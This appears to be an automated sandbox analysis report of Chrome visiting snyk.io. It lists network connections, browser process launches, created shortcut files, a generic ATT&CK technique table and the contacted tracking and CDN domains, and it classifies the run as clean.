Source: unknownNetwork traffic detected: HTTP traffic on port 50197 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50512 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50359
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50358
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50119
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50350
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50111
Source: unknownNetwork traffic detected: HTTP traffic on port 49930 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50110
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50352
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50354
Source: unknownNetwork traffic detected: HTTP traffic on port 50374 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50356
Source: unknownNetwork traffic detected: HTTP traffic on port 49986 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49850 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50360
Source: unknownNetwork traffic detected: HTTP traffic on port 50175 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50213 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50128
Source: unknownNetwork traffic detected: HTTP traffic on port 50419 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50012 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50369
Source: unknownNetwork traffic detected: HTTP traffic on port 50255 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49952 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50524 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50442 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50120
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50122
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50121
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50124
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50366
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50123
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50365
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50126
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50368
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50125
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50367
Source: unknownNetwork traffic detected: HTTP traffic on port 50048 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49825 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50370
Source: unknownNetwork traffic detected: HTTP traffic on port 49884 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49907 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50340 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50478 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49859 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50315 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49894 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50350 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50106 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50267 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50410 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49942 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50081 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50304
Source: unknownNetwork traffic detected: HTTP traffic on port 50444 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50303
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50306
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50305
Source: unknownNetwork traffic detected: HTTP traffic on port 50173 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50308
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50307
Source: unknownNetwork traffic detected: HTTP traffic on port 49919 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49954 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50014 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50309
Source: unknownNetwork traffic detected: HTTP traffic on port 49988 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50201 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50300
Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50301
Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50046 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49882 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50141 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50233 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50476 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50315
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50314
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50316
Source: unknownNetwork traffic detected: HTTP traffic on port 49976 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50318
Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50279 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50311
Source: unknownNetwork traffic detected: HTTP traffic on port 50394 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50313
Source: unknownNetwork traffic detected: HTTP traffic on port 50223 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50454 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49860 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50349 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50326
Source: unknownNetwork traffic detected: HTTP traffic on port 50503 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50325
Source: unknownNetwork traffic detected: HTTP traffic on port 49998 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50328
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50327
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50329
Source: unknownNetwork traffic detected: HTTP traffic on port 50245 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50322
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50321
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50324
Source: unknownNetwork traffic detected: HTTP traffic on port 50488 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50290 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50432 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50002 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50514 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50409 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49920 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50327 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49926 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50054
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50296
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50295
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50298
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50297
Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50299
Source: unknownNetwork traffic detected: HTTP traffic on port 49961 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50061
Source: unknownNetwork traffic detected: HTTP traffic on port 50286 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50063
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50062
Source: unknownNetwork traffic detected: HTTP traffic on port 50102 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50343 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50045 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50389 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50400 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50148 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50274 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50065
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50064
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50067
Source: unknownNetwork traffic detected: HTTP traffic on port 50377 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50066
Source: unknownNetwork traffic detected: HTTP traffic on port 50331 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50069
Source: unknownNetwork traffic detected: HTTP traffic on port 50205 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50240 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50183 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50070
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50071
Source: unknownNetwork traffic detected: HTTP traffic on port 50434 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50073
Source: unknownNetwork traffic detected: HTTP traffic on port 50080 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50308 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49869 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49674 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50227 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50252 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50502 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50195 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50422 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50076
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50078
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50077
Source: unknownNetwork traffic detected: HTTP traffic on port 49892 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50079
Source: unknownNetwork traffic detected: HTTP traffic on port 50390 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50515 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50081
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50080
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50083
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50082
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50085
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50084
Source: unknownNetwork traffic detected: HTTP traffic on port 49904 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49847 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50458 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50087
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50086
Source: unknownNetwork traffic detected: HTTP traffic on port 49870 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50089
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50088
Source: unknownNetwork traffic detected: HTTP traffic on port 50079 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50090
Source: unknownNetwork traffic detected: HTTP traffic on port 50481 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50094
Source: unknownNetwork traffic detected: HTTP traffic on port 49983 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50096
Source: unknownNetwork traffic detected: HTTP traffic on port 49938 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50023 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50095
Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50365 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50018
Source: unknownNetwork traffic detected: HTTP traffic on port 50193 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50259
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50019
Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49951 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50424 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50252
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50251
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50493
Source: unknownNetwork traffic detected: HTTP traffic on port 49916 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50012
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50254
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50496
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50253
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50495
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50014
Source: unknownNetwork traffic detected: HTTP traffic on port 50090 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50256
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50498
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50013
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50255
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50497
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50015
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50257
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50499
Source: unknownNetwork traffic detected: HTTP traffic on port 50456 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50260
Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49845 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50215 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50230 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50029
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50028
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50021
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50263
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50020
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50262
Source: unknownNetwork traffic detected: HTTP traffic on port 50318 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50023
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50265
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50022
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50264
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50025
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50267
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50266
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50027
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50269
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50026
Source: unknownNetwork traffic detected: HTTP traffic on port 49879 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50268
Source: unknownNetwork traffic detected: HTTP traffic on port 49985 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50264 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50270
Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.5:49715 version: TLS 1.2
Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.5:49724 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.107.246.60:443 -> 192.168.2.5:49776 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.107.246.60:443 -> 192.168.2.5:50219 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.107.246.60:443 -> 192.168.2.5:50329 version: TLS 1.2
Source: classification engineClassification label: clean1.win@22/545@148/41
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome AppsJump to behavior
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2332 --field-trial-handle=2272,i,10802499006494402137,4490958038480893554,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "http://snyk.io"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2332 --field-trial-handle=2272,i,10802499006494402137,4490958038480893554,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: Google Drive.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: YouTube.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Sheets.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Gmail.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Slides.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Docs.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome AppsJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnkJump to behavior
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire Infrastructure1
Drive-by Compromise
Windows Management Instrumentation1
Registry Run Keys / Startup Folder
1
Process Injection
1
Masquerading
OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
Registry Run Keys / Startup Folder
1
Process Injection
LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media4
Non-Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive5
Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture3
Ingress Tool Transfer
Traffic DuplicationData Destruction
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
No Antivirus matches
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
https://ampcid.google.com/v1/publisher:getClientId0%URL Reputationsafe
https://js.zi-scripts.com/unified/v1/master/getSubscriptions0%URL Reputationsafe
https://js.driftt.com/core/assets/js/22.6b9a301a.chunk.js0%URL Reputationsafe
https://developers.marketo.com/MunchkinLicense.pdf0%URL Reputationsafe
https://js.driftt.com/core/assets/css/8.6ac3976b.chunk.css0%URL Reputationsafe
NameIPActiveMaliciousAntivirus DetectionReputation
api.usercentrics.eu
35.241.3.184
truefalse
    unknown
    v.eps.6sc.co
    13.35.58.23
    truefalse
      unknown
      js.zi-scripts.com
      172.64.150.44
      truefalse
        unknown
        afe79c04fd8464db69f453355c110684-6aa967fe209738b1.elb.us-east-1.amazonaws.com
        34.193.113.164
        truefalse
          unknown
          d2l187peir7p6k.cloudfront.net
          3.161.242.80
          truefalse
            unknown
            scout.us1.salesloft.com
            35.175.94.211
            truefalse
              unknown
              eps.6sc.co
              75.2.108.141
              truefalse
                unknown
                fp2e7a.wpc.phicdn.net
                192.229.221.95
                truefalse
                  unknown
                  stats.g.doubleclick.net
                  74.125.133.154
                  truefalse
                    unknown
                    dl7g9llrghqi1.cloudfront.net
                    18.245.86.73
                    truefalse
                      unknown
                      d296je7bbdd650.cloudfront.net
                      143.204.179.196
                      truefalse
                        unknown
                        www.google.com
                        142.250.185.164
                        truefalse
                          unknown
                          api.segment.io
                          35.81.90.104
                          truefalse
                            unknown
                            app.usercentrics.eu
                            35.190.14.188
                            truefalse
                              unknown
                              stage-lb-orleans-1774680323.us-east-1.elb.amazonaws.com
                              34.200.187.106
                              truefalse
                                unknown
                                ws.zoominfo.com
                                104.16.118.43
                                truefalse
                                  unknown
                                  lon10.mktossl.com
                                  104.17.71.206
                                  truefalse
                                    unknown
                                    677-thp-415.mktoresp.com
                                    134.213.193.62
                                    truefalse
                                      unknown
                                      ax-0001.ax-msedge.net
                                      150.171.27.10
                                      truefalse
                                        unknown
                                        intentsify-production-lb-17344489.us-west-1.elb.amazonaws.com
                                        184.169.181.245
                                        truefalse
                                          unknown
                                          bg.microsoft.map.fastly.net
                                          199.232.214.172
                                          truefalse
                                            unknown
                                            analytics-alv.google.com
                                            216.239.32.181
                                            truefalse
                                              unknown
                                              aggregator.service.usercentrics.eu
                                              34.120.28.121
                                              truefalse
                                                unknown
                                                googleads.g.doubleclick.net
                                                172.217.23.98
                                                truefalse
                                                  unknown
                                                  uct.service.usercentrics.eu
                                                  34.95.108.180
                                                  truefalse
                                                    unknown
                                                    consent-api.service.consent.usercentrics.eu
                                                    35.201.111.240
                                                    truefalse
                                                      unknown
                                                      td.doubleclick.net
                                                      142.250.186.130
                                                      truefalse
                                                        unknown
                                                        snyk.io
                                                        23.77.250.63
                                                        truefalse
                                                          unknown
                                                          ib.anycast.adnxs.com
                                                          185.89.210.82
                                                          truefalse
                                                            unknown
                                                            s-part-0032.t-0009.t-msedge.net
                                                            13.107.246.60
                                                            truefalse
                                                              unknown
                                                              d1ysmqklpsb9ih.cloudfront.net
                                                              65.9.66.118
                                                              truefalse
                                                                unknown
                                                                scout.salesloft.com
                                                                unknown
                                                                unknownfalse
                                                                  unknown
                                                                  metrics.api.drift.com
                                                                  unknown
                                                                  unknownfalse
                                                                    unknown
                                                                    scout-cdn.salesloft.com
                                                                    unknown
                                                                    unknownfalse
                                                                      unknown
                                                                      secure.adnxs.com
                                                                      unknown
                                                                      unknownfalse
                                                                        unknown
                                                                        trackingapi.trendemon.com
                                                                        unknown
                                                                        unknownfalse
                                                                          unknown
                                                                          cdn.segment.com
                                                                          unknown
                                                                          unknownfalse
                                                                            unknown
                                                                            js.driftt.com
                                                                            unknown
                                                                            unknownfalse
                                                                              unknown
                                                                              assets.trendemon.com
                                                                              unknown
                                                                              unknownfalse
                                                                                unknown
                                                                                tracking.intentsify.io
                                                                                unknown
                                                                                unknownfalse
                                                                                  unknown
                                                                                  customer.api.drift.com
                                                                                  unknown
                                                                                  unknownfalse
                                                                                    unknown
                                                                                    pic.trendemon.com
                                                                                    unknown
                                                                                    unknownfalse
                                                                                      unknown
                                                                                      b.6sc.co
                                                                                      unknown
                                                                                      unknownfalse
                                                                                        unknown
                                                                                        j.6sc.co
                                                                                        unknown
                                                                                        unknownfalse
                                                                                          unknown
                                                                                          conversation.api.drift.com
                                                                                          unknown
                                                                                          unknownfalse
                                                                                            unknown
                                                                                            res.cloudinary.com
                                                                                            unknown
                                                                                            unknownfalse
                                                                                              unknown
                                                                                              c.6sc.co
                                                                                              unknown
                                                                                              unknownfalse
                                                                                                unknown
                                                                                                www.linkedin.com
                                                                                                unknown
                                                                                                unknownfalse
                                                                                                  unknown
                                                                                                  targeting.api.drift.com
                                                                                                  unknown
                                                                                                  unknownfalse
                                                                                                    unknown
                                                                                                    go.snyk.io
                                                                                                    unknown
                                                                                                    unknownfalse
                                                                                                      unknown
                                                                                                      px.ads.linkedin.com
                                                                                                      unknown
                                                                                                      unknownfalse
                                                                                                        unknown
                                                                                                        munchkin.marketo.net
                                                                                                        unknown
                                                                                                        unknownfalse
                                                                                                          unknown
                                                                                                          snap.licdn.com
                                                                                                          unknown
                                                                                                          unknownfalse
                                                                                                            unknown
                                                                                                            analytics.google.com
                                                                                                            unknown
                                                                                                            unknownfalse
                                                                                                              unknown
                                                                                                              ipv6.6sc.co
                                                                                                              unknown
                                                                                                              unknownfalse
                                                                                                                unknown
                                                                                                                NameMaliciousAntivirus DetectionReputation
                                                                                                                https://snyk.io/_next/static/chunks/9384.57f0a60a33b0d128.jsfalse
                                                                                                                  unknown
                                                                                                                  https://consent-api.service.consent.usercentrics.eu/consent/uw/3false
                                                                                                                    unknown
                                                                                                                    https://snyk.io/_next/data/Cp4abAN54CGUdTYwS0J62/en-US/product.json?slug=productfalse
                                                                                                                      unknown
                                                                                                                      https://go.snyk.io/js/forms2/js/forms2.min.jsfalse
